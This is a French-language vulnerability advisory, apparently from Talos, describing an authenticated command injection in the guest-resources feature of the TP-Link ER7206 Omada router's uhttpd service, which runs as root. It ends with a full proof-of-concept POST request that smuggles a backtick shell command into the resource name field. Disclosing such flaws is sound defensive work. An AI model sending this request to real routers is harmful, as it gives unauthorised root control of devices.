
Vulnérabilité d'injection de commande dans le routeur VPN Gigabit Omada TP-Link ER7206 via uhttpd freeStrategy
Vulnérabilité d'injection de commande dans le routeur VPN Gigabit Omada TP-Link ER7206 uhttpd freeStrategy
Une vulnérabilité d'exécution de commande existe dans la fonctionnalité de ressource invitée du routeur VPN Gigabit Omada Tp-Link ER7206 1.3.0 build 20230322 Rel.70591. Une requête HTTP spécialement conçue peut conduire à l'exécution arbitraire de commandes. Un attaquant peut envoyer une requête HTTP authentifiée pour déclencher cette vulnérabilité.
Les versions ci-dessous ont été testées ou vérifiées comme vulnérables par Talos, ou confirmées comme vulnérables par le fournisseur.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
Le routeur VPN Gigabit Omada ER7206 est une solution réseau haute performance qui prend en charge la connectivité gigabit, un VPN hautement sécurisé et l'intégration avec Omada SDN pour la gestion centralisée dans le cloud et le provisionnement sans intervention.
Le routeur VPN Gigabit Omada ER7206 exécute divers services pour gérer le routeur ou les appareils qui y sont connectés. L'un de ces services est uhttpd, qui s'exécute sur les ports 80/443. Il fournit aux utilisateurs une interface web pour configurer et gérer le routeur. Par défaut, le service s'exécute en tant qu'utilisateur root. Un attaquant peut obtenir un accès root à l'appareil en exploitant ce service.
Une vulnérabilité d'injection de commande existe dans le service uhttpd lorsqu'une ressource invitée est ajoutée à l'appareil. Dans l'interface web, la page des ressources invitées est accessible en naviguant vers Authentication -> Authentication Settings -> Guest Resources. Elle contient des fonctionnalités permettant d'ajouter, de modifier et de supprimer des ressources invitées. Lorsqu'une ressource invitée est ajoutée, cela déclenche la requête HTTP POST suivante :
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D